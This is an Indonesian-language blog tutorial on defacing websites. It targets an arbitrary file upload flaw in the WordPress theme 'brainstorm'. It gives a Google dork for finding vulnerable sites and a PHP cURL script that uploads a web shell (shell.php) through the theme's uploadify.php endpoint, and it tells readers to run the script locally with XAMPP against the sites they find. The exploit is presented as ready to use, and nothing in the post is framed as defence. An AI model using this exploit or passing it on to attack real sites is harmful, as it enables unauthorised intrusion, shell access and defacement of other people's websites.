Jumat, 22 April 2016

Tutorial Deface dengan WP Themes Brainstorm Arbitrary File


 

   Assalamualaikum :v

Berjumpa lgi bersama sya si tamvan Mr.3RR0R

Sekarang sya akan membahas tutorial deface dengan "Wordpress themes brainstorm"

Entah ini exploit baru atau lama , cuman nemu doang dari blog sebelah :v

ok gan langsung aja pelajari tutor di bwah ini

Dork:
inurl:/wp-content/themes/brainstorm

CSRF :

<?php

$uploadfile="shell.php";
$ch = curl_init("www.contoh.com/[path]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",
              'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

  print "$postResult";

?> 

    Pertama gunakan dork diatas di google

klau sudah bug pathnya liat di bwah

www.contoh.com/(path)/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php

klau gambarnya kyak gini , berarti vulnerable :v




Klau gambarnya kyak gitu , sisa gunakan CSRF yg diatas , gunakan xampp :v .

OK gitu aja gan , klau ada yg kurang di pahami silahkan isi komentar di bwah :D

Happy Enjoy :D

Waasalamualaikun gan :v


Source : TKJ Cyber Art

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Share this

0 Comment to "Tutorial Deface dengan WP Themes Brainstorm Arbitrary File"

Posting Komentar